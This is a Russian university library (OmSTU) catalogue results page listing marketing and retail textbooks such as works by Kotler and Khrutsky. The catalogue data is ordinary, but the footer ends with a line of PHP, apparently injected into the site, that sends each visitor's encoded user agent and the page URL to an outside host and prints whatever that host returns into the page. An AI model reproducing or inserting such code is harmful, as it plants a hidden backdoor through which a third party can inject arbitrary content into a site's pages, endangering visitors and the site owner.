Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

175 пользователей



 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=Конкурент")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 86
1. 
Хруцкий, Валерий Евгеньевич. Современный маркетинг: Настол. кн. по исслед. рынка [Текст] : Учеб. пособие по маркетингу для вузов гуманитар. профиля и учреждений доп. образования / В. Е. Хруцкий, И. В. Корнеева, 2003. - 559 с.

В основе книги - четкое, методически выверенное изложение современной технологии маркетинга (от выбора стратегии до управления маркетинговой деятельностью) с анализом конкретных ситуаций в практике российских компаний.

Приводятся образцы необходимых форм и документов (включая план маркетинга, должностные инструкции, положения об отделе маркетинга и др.), тесты, анкеты и опросные листы.

2. 
Маркетинг [Электронный ресурс] : Электрон. учеб. пособие / Нижегор. ин-т менеджмента и бизнеса, 2001. - 1 o=эл. опт. диск (CD-R)
Держатели документа (Информация об экземплярах) 
3. 
Шлыков, Владимир Викторович. Комплексное обеспечение экономической безопасности предприятия [Текст] / В. В. Шлыков; Науч. ред. В. П. Сальников, 1999. - 138 с.
Держатели документа (Информация об экземплярах) 
4. 
Модульная программа для менеджеров [Текст] : В 17 т. 5 : Управление производительностью и качеством / Г. Р. Кремнев, 1999. - 287 с.
Держатели документа (Информация об экземплярах) 
5. 
Котлер, Филип. Маркетинг от А до Я [Текст] : 80 концепций, которые должен знать каждый менеджер / Ф. Котлер; Пер. с англ. Т. В. Виноградова и др.; Под ред. Т. Р. Тэор, 2003. - 219 с.
Держатели документа (Информация об экземплярах) 
6. 
Алферова Л. А. Маркетинг [Текст] : Учеб. метод. пособие / Л. А. Алферова, 2000. - 47 с.
Держатели документа (Информация об экземплярах) 
7. 
Справочник по политическому консультированию [Текст] : Пер. с англ. / Под ред. Д. Д. Перлматтера, 2002. - 328, [1] с.
Ключевые слова 
8. 
Барроу, Колин. Бизнес-планирование [Текст] : Полн. рук. / К. Барроу, П. Барроу, Р. Браун; Пер. с англ. М. Веселковой, 2003. - 397, [2] с.
Держатели документа (Информация об экземплярах) 
9. 
Алферова Л. А. Маркетинг [Текст] : Учеб. пособие / Л. А. Алферова, 2000. - 67 с.
Держатели документа (Информация об экземплярах) 
10. 
Котлер, Филип. Маркетинг. Менеджмент [Текст] : Анализ, планирование, внедрение, контроль / Ф. Котлер; М. Бугаев, О. А. Третьяк, 2000. - 887 с.
11. 
Хруцкий, Валерий Евгеньевич. Современный маркетинг [Текст] : Настол. кн. по исслед. рынка: Учеб. пособие по маркетингу для вузов гуманитар. профиля и учреждений дополн. образования / В. Е. Хруцкий, И. В. Корнеева, 2000. - 528 с.
Держатели документа (Информация об экземплярах) 
12. 
Леви, Майкл. Основы розничной торговли [Текст] / М. Леви, А. Вейтц; С. Жильцов, Ю. Н. Коптуревский, 1999. - 446 с.
Ключевые слова 
Торговля -- Розничная торговля -- Покупатель -- Конкурент -- Бизнес -- Менеджмент -- Фирма -- Торговля-микс -- Собственность -- Франчайзер -- Покупка -- Рынок -- Товар -- Принятие решения -- стратегическое планирование -- Магазин -- Управление товаром -- Планирование -- Ассортимент -- Закупка -- Поставщик -- Переговоры -- Ценообразование -- Цена -- Бюджет -- Коммуникация -- Сбыт -- Связь с общественностью -- Стимулирование -- Менеджер -- Обучение -- Заработная плата -- Вознаграждение -- Дизайн -- Обслуживание -- Продажа -- Модный товар -- Услуга -- Компания
13. 
Деловое планирование [Текст] : Методы. Организация. Соврем. практика: Учеб. пособие для экон. специальностей / В. М. Попов, Л. П. Кураков, С. И. Ляпунов, Х. Х. Мингазов, 1997. - 366 с.
Держатели документа (Информация об экземплярах) 
14. 
Дурович, Александр Петрович. Маркетинг в предпринимательской деятельности [Текст] / А. П. Дурович, 1997. - 462 с.
15. 
Котлер, Филип. Основы маркетинга [Текст] / Ф. Котлер; Пер. с англ. В. Б. Боброва; Под ред. Е. М. Пеньковой, 1992. - 734 с.
Держатели документа (Информация об экземплярах) 
16. 
Хруцкий, Валерий Евгеньевич. Современный маркетинг [Текст] : Настол. кн. по исслед. рынка: Учеб. пособие по маркетингу для вузов гуманитар. профиля и учреждений доп. образования / В. Е. Хруцкий, И. В. Корнеева, 1999. - 526 с.
Держатели документа (Информация об экземплярах) 
17. 
Армстронг, Гари. Введение в маркетинг [Текст] : Пер. с англ. / Г. Армстронг, Ф. Котлер; Н. В. Шульпина, 2000. - 638 с.
Ключевые слова 
Маркетинг -- Учебник и пособие -- Управление маркетингом -- Маркетинговое исследование -- Потребительский рынок -- Стратегическое планирование -- Клиент -- Конкурент -- Маркетинговая информационная система -- Маркетинг услуг -- Товар -- Ценообразование -- Цена -- Товародвижение -- Логистика -- Розничная торговля -- Оптовая торговля -- Маркетинговая коммуникация -- Связь с общественностью -- Реклама -- Стимулирование сбыта -- Прямой маркетинг -- Интерактивный маркетинг -- Социальная ответственность -- Консьюмеризм -- Инвайронментализм -- Глобальный маркетинг -- Глобальный рынок -- Личная продажа -- Покупательское поведение -- Маркетинговая среда
Держатели документа (Информация об экземплярах) 
18. 
Методические указания по выполнению курсового проекта по маркетингу [Текст] / ОмГТУ, 2000. - 24 с.
Держатели документа (Информация об экземплярах) 
Полный текст
19. 
Основы маркетинга [Текст] : Пер. с англ. / Ф. Котлер, Г. Армстронг, Д. Сондерс, В. Вонг; Н. В. Шульпина, 2000. - 943 с.
20. 
Фатрелл, Чарльз. Основы торговли [Текст] / Ч. Фатрелл, 1995. - 698 с.


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2905 - 24.05.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.36 с.12 запросов, 0.82c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;